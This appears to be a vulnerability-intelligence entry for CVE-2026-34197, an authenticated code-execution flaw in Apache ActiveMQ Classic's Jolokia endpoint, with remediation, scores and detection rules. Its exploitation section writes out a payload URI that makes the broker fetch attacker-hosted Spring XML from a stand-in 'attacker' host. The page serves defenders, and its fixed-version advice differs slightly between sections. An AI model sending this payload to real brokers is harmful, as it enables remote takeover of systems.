ThreatLevelBeta
Planned Fix

CVE-2026-34197

Apache ActiveMQ Jolokia RCE (authenticated)
Loading...

Summary

Apache ActiveMQ Classic exposes a Jolokia JMX-HTTP bridge at /api/jolokia/ in the web console. An authenticated attacker can use Jolokia exec operations on broker MBeans to invoke addNetworkConnector or addConnector with a crafted vm:// discovery URI, causing the broker to load remote Spring XML and execute attacker-controlled code in the broker JVM. On some 6.0.x deployments with the older web-console security flaw, the attack path can become effectively unauthenticated.

Why Planned Fix?

5/6
Authentication required
Mixed internet / internal deployment
No user interaction needed
Exploitable in default configuration
Public PoC available
High impact vulnerability

Exploitation Details

Type
RCE (Remote Code Execution)
Is exploitable with default configuration?
Yes
Is authentication needed?
Yes
PoC / Exploit
Yes
github.com
Impact

Execute arbitrary code on the ActiveMQ broker JVM as the broker process user.

RCE (Remote Code Execution)
Exploitation Requirements
  • Authentication required
Exploitation Process

The attacker first authenticates to the ActiveMQ web console, then sends a POST request to /api/jolokia/ invoking an exec operation on the broker MBean, typically addNetworkConnector(String) or addConnector(String). The payload uses a crafted discovery URI such as static:(vm://... ?brokerConfig=xbean:http://attacker/evil.xml) so the broker fetches attacker-controlled Spring XML. When the remote XML is parsed, bean initialization occurs before full validation, allowing attacker-controlled bean logic or Runtime.exec() to run on the broker JVM; success is verified by callback traffic, a spawned shell, or broker logs showing the malicious vm:// / brokerConfig path.

Detection Resources
Manual Detection
cycognito.compurple-ops.io
2
Script Detection
github.com
1
Scanner Detection
Tenable Nessus
1

Affected Software

Vendor:Apache Software Foundation
ProductAffected Versions
Apache ActiveMQ Classicbefore 5.19.4; 6.0.0 through 6.2.2
Description

Apache ActiveMQ Classic is an open-source, Java-based message broker used to route asynchronous messages between applications over JMS and other protocols.

Deployment:Mixed (internet/internal)
|
Protocol:HTTP
|
Ports:8161
Affected ComponentJolokia JMX-HTTP bridge in the web console, especially /api/jolokia/ exec operations on BrokerService.addNetworkConnector and addConnector.

Jolokia JMX-HTTP bridge in the web console, especially /api/jolokia/ exec operations on BrokerService.addNetworkConnector and addConnector.

Affected Endpoints(1)/api/jolokia/
1./api/jolokia/
Enterprise UsageEstimated likelihood that this vendor/product is deployed in enterprise environments. AI-generated estimation based on market presence, product type and adoption signals — not exact data.
Very Low
Low
Medium
High
Very High
Vendor Size:Medium
Remediation
Workaround
On affected 6.0.0-6.1.1 systems, update conf/jetty.xml to require authentication for the API web context, and restrict /api/jolokia/ and port 8161 to trusted management networks. This reduces exposure but does not replace patching.

On affected 6.0.0-6.1.1 systems, update conf/jetty.xml to require authentication for the API web context, and restrict /api/jolokia/ and port 8161 to trusted management networks. This reduces exposure but does not replace patching.

activemq.apache.org
Patch

Not available

Update
Upgrade Apache ActiveMQ Classic to the fixed release line; Apache's advisory recommends 5.19.5 or 6.2.3 or later.

Upgrade Apache ActiveMQ Classic to the fixed release line; Apache's advisory recommends 5.19.5 or 6.2.3 or later.

activemq.apache.org
Threat Intelligence
EPSS Score5.6%

Probability of exploitation in the next 30 days

EPSS Percentile90%

Worse than 90% of all CVEs

Last updated: Loading...
CISAKEV
CISA KEV
Not Listed
Active Exploitation
No Evidence
Threat Actors

No known threat actors

Detection Rules2
Other
POST /api/jolokia/ invoking addNetworkConnector or addConnector with brokerConfig=xbean:http or vm:// URIs
Other
ActiveMQ broker log entries showing vm:// transport creation followed by brokerConfig=xbean:http and remote XML fetches

NVD Data

Published: Loading...Modified: Loading...

Description Summary

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue

CVSS Base Score

8.8
High

CVSS Vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Attack Vector (AV)
Physical
Local
Adjacent
Network
Attack Complexity (AC)
High
Low
Privileges Required (PR)
High
Low
None
User Interaction (UI)
Required
None
Scope (S)
Unchanged
Changed
Confidentiality (C)
None
Low
High
Integrity (I)
None
Low
High
Availability (A)
None
Low
High
CWE:CWE-20 Improper Input ValidationCWE-94 Code Injection
|
NVD:CVE-2026-34197
|
Version From:
|
Version Upto:

Sources

11
SourceArticle
activemq.apache.orgCVE-2026-34197 announcement
activemq.apache.orgSecurity Advisories - ActiveMQ Classic
www.openwall.comoss-security: CVE-2026-34197
activemq.apache.orgActiveMQ 5.19.4 Release
activemq.apache.orgActiveMQ 5.19.5 Release
activemq.apache.orgCVE-2024-32114 announcement
www.cycognito.comEmerging Threat: CVE-2026-34197
purple-ops.ioCVE-2026-34197 ActiveMQ RCE Critical Analysis
github.comCVE-2026-34197.yaml
github.comCVE-2026-34197 activemq PoC
www.tenable.comCVE-2026-34197

Priority History

Planned FixLoading...

Initial analysis